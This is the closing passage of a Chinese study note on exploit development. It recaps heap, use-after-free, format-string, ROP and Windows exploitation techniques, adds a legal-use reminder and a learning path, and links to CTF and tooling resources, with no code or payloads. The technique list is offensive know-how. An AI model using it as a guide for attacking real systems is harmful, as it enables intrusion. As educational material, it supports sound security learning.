**堆溢出**:Fastbin、Unsortedbin、各种 House of 技术 2. **UAF**:对象重用、House of Spirit/Force 3. **格式化字符串**:信息泄露、任意写入 4. **ROP 链**:Gadget 查找、链构造、SROP 5. **Linux 利用**:Ret2LibC、GOT 覆盖、Orw 6. **Windows 利用**:SEH、ROP、VirtualAlloc ### 深入思考 **攻防对抗**: - 保护机制不断增强 - 利用技术持续演进 - 需要持续学习 **合法使用**: - 仅在授权环境 - 用于安全研究 - 遵守法律法规 ### 最佳实践 **学习路径**: - 从 CTF 开始 - 学习汇编和逆向 - 实践漏洞利用 - 阅读 writeup **研究建议**: - 关注 CVE - 分析真实漏洞 - 参与漏洞挖掘 - 分享研究成果 --- ## 参考资料 ### 学习资源 - **pwn.college**: https://pwn.college - **LiveOverflow**: https://youtube.com/LiveOverflow - **Shellstorm**: http://shell-storm.org ### 工具资源 - **Pwntools**: https://github.com/Gallopsled/pwntools - **ROPgadget**: https://github.com/JonathanSalwan/ROPgadget - **one_gadget**: https://github.com/david942j/one_gadget --- *Day 261 完成 | 漏洞利用开发深入详解 | 字数:约 35,000 字 (新增)*
myh0st
2026年4月13日 23:20
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